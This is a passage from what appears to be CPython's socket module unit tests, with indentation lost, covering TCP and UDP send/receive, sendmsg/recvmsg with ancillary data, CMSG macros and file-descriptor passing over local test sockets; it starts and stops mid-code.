def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while 1:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and Recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = 3.0
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
with self.assertRaises(socket.timeout):
while True:
self.sendmsgToServer([b"a"*512])
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
# FreeBSD < 8 doesn't always set the MSG_TRUNC flag when a truncated
# datagram is received (issue #13001).
@support.requires_freebsd_version(8)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
@support.requires_freebsd_version(8)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(socket.timeout,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
# Receive into multiple buffers (scatter write).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
